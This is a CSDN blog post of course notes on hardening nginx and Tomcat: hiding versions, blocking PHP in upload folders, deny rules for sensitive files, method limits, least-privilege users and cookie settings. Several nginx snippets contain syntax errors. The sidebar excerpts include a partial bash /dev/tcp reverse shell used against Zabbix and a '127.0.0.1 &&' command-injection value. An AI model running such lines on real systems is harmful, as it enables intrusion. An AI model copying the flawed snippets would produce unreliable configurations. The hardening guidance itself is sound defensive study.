安全学习安全加固nginx/tomcat卡第十一天

最新推荐文章于 2022-08-18 01:29:29 发布
最新推荐文章于 2022-08-18 01:29:29 发布
阅读量130 收藏
点赞数
分类专栏: 安全学习 文章标签: nginx tomcat
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/u013133143/article/details/97825865
版权

本文为苏尚武老师运维安全课程课程笔记

  • nginx
    禁止显示当前版本
    配置文件server_tokens off;
    编译安装时注释掉/src/core/nginx.h内NGINX_VERSION和NGINX_VER

禁止上传目录禁止的php文件
单个目录

 location ~ /upload/.*\.(php|php5)?${
 deny all;
 }

多个目录

location ~* ^/(administartor|upload)/.*\.(php)?${
deny all;
}

禁止访问所有目录下的敏感文件

location ~. *\.(sql|log|txt|rar|zip|sh|py|svn|git)
{
deny all;
}

禁止不必要的http请求方式

if($request_method !~ ^(GET|HEAD|POST)$)
{
return 405;
}

设置nginx和php-fpm为nobody

  • tomcat
    tomcat弱口令零进入后台
    补丁和漏洞管理
    设置最小权限运行tomcat
    创建不可登录用户 useradd /sbin/nologin tomcat
    删掉管理界面
    网络级限制限制只有本机能访问
    隐藏tomcat版本号修改$CATALINNA_HOME/conf/server.xml
    connector子添加server字段等于WAF2.0
    关闭自动部署
    同上文件,
    session设置超时
    修改conf/web.xml

    20

    启动用cookie的HttpOnly属性
    conf.context.xml
    <Context userHttpOnly=‘true’ …/>
2ox
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Nginx 高性能调优与安全加固实战指南
菜小徐的博客
06-12 426
本文详细介绍了Nginx的性能调优、安全加固和内核参数优化等方面的实践方法。从 Nginx 的 master-worker 机制、系统与 Nginx 性能调优、内核参数优化,到安全加固措施,以及其他相关工具如 Apache 自带的压力测试工具 ab。本文旨在为您提供一个全面的 Nginx 调优与安全加固的实战指南。
zabbix监控Nginx/Tomcat/MySQL
02-24
A机器:zabbix服务端(192.168.234.128)B机器:zabbix客户端(192.168.234.125)在B机器(zabbix客户端)操作:编辑nginx虚拟主机配置文件:在server{}中添加以下内容:重载nginx配置:测试:#nginx状态信息已显示...
4.3.1 Nginx---4.4.1 tomcat
weixin_33834075的博客
05-20 92
2019独角兽企业重金招聘Python工程师标准>>> ...
nginx性能配置参数说明:
weixin_30879169的博客
10-08 1016
nginx性能配置参数说明: nginx的配置:main配置段说明一.正常运行的必备配置: 1、user username [groupname]; 指定运行worker进程的用户和组 2、pid /path/to/pidfile_name; 指定nginxf进程的pid文件路径。 3、worker_rlimit...
渗透测试-WEB安全梳理-中间件(apache、IIS、tomcat、weblogic、websphere、jboos、nginx
最新发布
lza20001103的博客
08-18 4586
渗透测试-WEB安全梳理-中间件(apache、IIS、tomcat、weblogic、websphere、jboos、nginx) WEB安全梳理-中间件(apache、IIS、tomcat、weblogic、websphere、jboos、nginx) m0be1 Hacking黑白红 2022-06-13 23:47 发表于安徽 文章目录渗透测试-WEB安全梳理-中间件(apache、IIS、tomcat、weblogic、websphere、jboos、nginx)目录中间件Apache一、Apac
vue项目部署到nginx/tomcat服务器的实现
10-16
主要介绍了vue项目部署到nginx/tomcat服务器的实现,文中通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,需要的朋友们下面随着小编来一起学习学习
安全学习安全加固openResty第十二天
蟋蟀15型
07-31 748
本文为苏尚武老师运维安全课程课程笔记 安装OpenResty yum install -y readline-devel pcre-devel openssl-devel git wget vim openssl-devel gcc curl tar -zxvf ngx_openresty-1.9.3.2.tar.gz ...
安全学习入侵检测打第十六天
蟋蟀15型
08-05 396
本文为苏尚武老师运维安全课程课程笔记 osquery osquery是一个可以把操作系统信息转换成数据库的东西,查询类似于查询数据库 安装故过程随意,最后配置文件 cp /usr/share/osqure/osqure.exmple.conf /etc/osqure/osqeer .conf osqueryi交互式模拟 osqueryd 后台进程模式 osquery+kolide fle...
安全基础命令执行/XSS打第五天
蟋蟀15型
07-19 364
本文为苏尚武老师运维安全课程课程笔记 命令执行 危害高于sql注入,可以随意直接执行系统命令。没有对输入过滤 php中system、exec、shell、passthru、popen、proc_popen 案例: 命令注入 127.0.0.1 && username -ar 文件上传 客户端验证、mime验证 漏洞测试环境https://github.com/c0ny1/...
安全学习入侵检测-蜜罐打第十五天
蟋蟀15型
08-02 300
本文为苏尚武老师运维安全课程课程笔记 蜜罐 本质上是一种对攻击方的欺骗捕获分析,了解攻击者使用方法和意图 cowrie 一款伪装成ssh的蜜罐,可以获取攻击者的字典 搭建 useradd cowrie passwd cowrie yum install -y git python-virtualenv bzip2-devel libffi-devel vim net-tools mysql-...
安全基础-渗透流程/HTTP请求打第二天
蟋蟀15型
07-16 295
本文为苏尚武老师运维安全课程课程笔记 目录:什么是渗透> 常规渗透> 非常规渗透 > 渗透流程 / http基础 > burpsuite >fiddler > firefox插件 渗透 渗透是模拟黑客攻击找到企业中的漏洞 分类:白帽、黑帽 常规渗透 签订保密协议、针对性目标测试、指定测试范围 非常规渗透 APT攻击、红蓝对抗 渗透测试流程 攻击渗透流程图...
安全学习安全防护打第十四天
蟋蟀15型
08-01 274
本文为苏尚武老师运维安全课程课程笔记 密码安全 不要使用弱口令 服务器密码和应用密码不同 文档传输加密文档 有价值的使用bitlocker加密 电脑自动锁屏 定期修改密码 邮件安全 拒绝接可执行文件 不要点击钓鱼网址 邮件加密,密码通过其他方式告知 定期删除邮件 上网安全 物理机隔离,禁止上网,通过vmware运行 网络速度不正常,要检查 公共上网的时候,注册用户名密码,不使用自己信息 连接公...
安全基础zabbix漏洞打第七天
蟋蟀15型
07-23 253
本文为苏尚武老师运维安全课程课程笔记 zabbix配置不当 zabbix弱口令 zabbix注入利用 修复建议 没有更改默认口令,没有更改密码。默认口令Admin:zabbix 以及默认的guest账户没有密码 进入zabbix管理页面,添加脚本。然后执行系统命令,获取其他信息得到管理权限 监控项监控端口ip bash -i > & /dev/tcp/45.xx.xxx.x1/...
安全学习应急排查打第二十天
蟋蟀15型
08-09 252
本文为苏尚武老师运维安全课程课程笔记 应急工具 busybox 下载 cd /bin/ wget https://busybox.net/downloads/binaries/1.30.0-i686/busybox chmod 755 busybox 命令busybox top 判断系统后门 检查后门 chkrootkit rkhunter 查杀:cleamav webshell查杀 D...
安全学习主机扫描打第十九天
蟋蟀15型
08-08 226
本文为苏尚武老师运维安全课程课程笔记 nessus 使用docker安装 docker pull sometheycallme/docker-nessus docker run -t --name nessus -p 8834:8834 sometheycallme/docker-nessus masscan 安装 yum install nmap yum install opens...
安全基础web漏洞,漏洞注入打第四天
蟋蟀15型
07-18 212
本文为苏尚武老师运维安全课程课程笔记 SQL注入漏洞 例子 调整字符参数 ASP注入 透字猜解法。判断注入,猜表名,猜列名,猜列长 如何发现sql注入漏洞 通过web漏洞扫描器 在参数后面去添加错误语句 大量的对参数Fuzz测试 直觉发现。。。。 注入分类 数字型注入:如年龄,页码 字符型注入:如账户、 注入提交方式 GET POST COOKIE HTTP头部注入 ...
安全学习elasticsearch/mongodb打第八天
蟋蟀15型
07-25 204
本文为苏尚武老师运维安全课程课程笔记 elasticsearch 搜索引擎,通常用于检索查询,通过elk来搭建社工库 默认端口9200 可以通过在github中去搜索漏洞案例 安全加固:不要暴露公网;不要以root身份启动;9200加上http basic-autch身份认证 mongodb 安全加固: 文章查看Mongodb黑客事件浅析 确保mongodb数据库开启身份验证,创建独立账号密码...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值